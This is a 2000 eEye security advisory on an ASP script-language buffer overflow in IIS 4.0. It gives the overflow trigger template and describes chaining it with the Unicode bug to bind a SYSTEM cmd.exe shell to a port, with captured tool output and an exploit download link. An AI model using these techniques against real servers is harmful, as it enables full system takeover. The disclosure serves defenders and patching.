IIS ASP $19.95 hack - IISHack 1.5

Release Date:
November 3rd, 2000

Systems Affected:
Windows NT 4.0 IIS 4.0 sp6 (vulnerable)
Windows NT 5.0 IIS 5.0 (not vulnerable)

Description:
There exists a buffer overflow, that can be exploited to gain SYSTEM level
access, within the IIS (Internet Information Server) .ASP ISAPI file parsing
mechanism.

This is not a remote exploit, it is a local one (However, we will explain
later in the advisory how you _could_ pull this exploit off remotely.). It
is local in the sense that you need to actually create an "evil" .asp file
that when parsed by IIS will cause inetinfo.exe to buffer overflow and
therefore allow you to take control of the local server as SYSTEM.

So who is affected by this? Any web hosting company or internet service
provider that is running multiple clients within the same NT4 IIS 4 web
server. Basically any client (or attacker) who can update their website,
i.e. upload a new default.asp or anything.asp, can then execute code as
SYSTEM and therefore take complete control of your server. They could then
do whatever they want to any of the other client websites hosted on that NT4
server. On the other hand they could install sniffers or crack passwords to
further their control of your network.

Hence the title $19.95 hack... Anyone with $20 dollars to spend can
potentially break into any web hosting company or internet service provider
running NT4+IIS4. Simply buy an account with a web hosting company, upload
your evil.asp and request that evil.asp from your website, I.E.
http://www.badguy.com/evil.asp, and your executing code on that server as
SYSTEM.

Here is an example .asp file that will cause NT4+IIS4's inetinfo.exe to
overflow.

----start-cut-of-example.asp----
<SCRIPT LANGUAGE="[buffer]" RUNAT="Server">
</SCRIPT>
----start-cut-of-example.asp----

Where [buffer] is 2220 characters or more. Yes, this overflow is
exploitable. See section below.

So you don't have $20 dollars to spend, or a server does not host websites?
What then? Well there are going to be situations when a remote attack is
possible.

An example situation would be a server that has a guest book/message board
system that does not strip out SCRIPT comments when it writes to its
returned .asp file. So an attacker could go to a web board and within the
"Enter your message here:" box (or whatever) they could simply paste in the
contents of the script language overflow and submit the message. Then once
they requested the .asp file that has that message (the embedded overflow
msg) it would cause IIS to parse that .asp file, overflow, and execute their
code.

On another note you could couple this attack with the recent IIS Unicode bug
to use cmd.exe to echo the contents of your evil.asp to the remote system
then when you request evil.asp your code is executed as SYSTEM. In fact, we
have created a sample exploit to show how this .asp language overflow and
the IIS Unicode exploit could be used together to remotely compromise any
NT4+IIS4+SP6(or lower) system that is behind in installing hot fixes.

Due to the nature of this attack it is likely and quite possible that
firewalls will not protect you against attacks like this.

The Exploit:
How to remotely exploit a system? Use the IIS Unicode exploit + .asp
language overflow.
For those of you not familiar with the IIS Unicode exploit, it basically
allows you to remotely execute commands against IIS as IUSR_MACHINE. Now
since we can execute commands via cmd.exe we could try to make the remote
web server connect out to an FTP server to grab a file (sort of like the
first IISHack) but you would still be executing code as IUSR_MACHINE. The
way our exploit works is by using the Unicode bug to echo our .asp file
(complete with shell code, to bind cmd.exe to a port ;-]) to a remote server
and then request that .asp file which then causes inetinfo.exe to overflow
resulting in a SYSTEM privileged cmd.exe to be bound to a specified port.
Now, in most circumstances you should have correct acl's on cmd.exe (that
would not allow IUSR_MACHINE to touch it) as well as some other security
precautions in place, so we understand this exploit will not work on a
secured system. However, this is just proof of concept and as most of us
know, most IIS servers do not have proper local security in place. The
exploit basically looks like the following when compiled:

C:\we are still hiring good programmers> iishack1.5.exe
IISHack Version 1.5
eEye Digital Security
http://www.eEye.com
Code By: Ryan Permeh & Marc Maiffret
eEye Digital Security takes no responsibility for use of this code.
It is for educational purposes only.

Usage: IISHack1.5 [server] [server-port] [trojan-port]

C:\send resume to hire@eeye.com> iishack1.5.exe www.[yourowncompany].com 80
6969
IISHack Version 1.5
eEye Digital Security
http://www.eEye.com
Code By: Ryan Permeh & Marc Maiffret
eEye Digital Security takes no responsibility for use of this code.
It is for educational purposes only.

Attempting to find an executable directory...
Trying directory [scripts]
Executable directory found. [scripts]
Path to executable directory is [C:\Inetpub\scripts]
Moving cmd.exe from winnt\system32 to C:\Inetpub\scripts.
Successfully moved cmd.exe to C:\Inetpub\scripts\eeyehack.exe
Sending the exploit...
Exploit sent! Now telnet to www.[yourowncompany].com on port 6969 and you
should get a cmd prompt.
C:\> telnet www.[yourowncompany].com 6969
Trying www.[yourowncompany].com...
Microsoft(R) Windows NT(TM)
(C) Copyright 1985-1996 Microsoft Corp.

C:\WINNT\system32>whoami
NT AUTHORITY\SYSTEM

Download the full exploit from:
http://www.eEye.com/html/advisories/IISHack1.5.zip

Vendor Status:
Microsoft has already fixed this .asp language overflow in prior hot fixes
and applied it to most post service pack 6 hot fixes. This flaw has been
fixed in the latest versions of W3SVC.DLL. Installing any recent hotfix will
fix the problem.
Here is a list of _some_ MS advisories and hotfixes that will fix the .asp
language overflow vulnerability:
MS00-080: Patch Available for "Session ID Cookie Marking" Vulnerability
MS00-060: Patch Available for "IIS Cross-Site Scripting" Vulnerabilities
MS00-057: Patch Available for "File Permission Canonicalization"
Vulnerability
MS00-030: Patch Available for "Malformed Extension Data in URL"
Vulnerability
MS00-023: Patch Available for "Myriad Escaped Characters" Vulnerability
MS00-019: Patch Available for "Virtualized UNC Share" Vulnerability
MS00-018: Patch Available for "Chunked Encoding Post" Vulnerability

W3SVC versions greater than 720 addresses this issue. So if you've been
keeping up to date with your hot fixes then you should not be vulnerable to
this issue.

Copyright (c) 1998-2000 eEye Digital Security
Permission is hereby granted for the redistribution of this alert
electronically. It is not to be edited in any way without express consent of
eEye. If you wish to reprint the whole or any part of this alert in any
other medium excluding electronic medium, please e-mail alert@eEye.com for
permission.

Disclaimer
The information within this paper may change without notice. Use of this
information constitutes acceptance for use in an AS IS condition. There are
NO warranties with regard to this information. In no event shall the author
be liable for any damages whatsoever arising out of or in connection with
the use or spread of this information. Any use of this information is at the
user's own risk.

Feedback
Please send suggestions, updates, and comments to:

eEye Digital Security
mail:info@eEye.com
http://www.eEye.com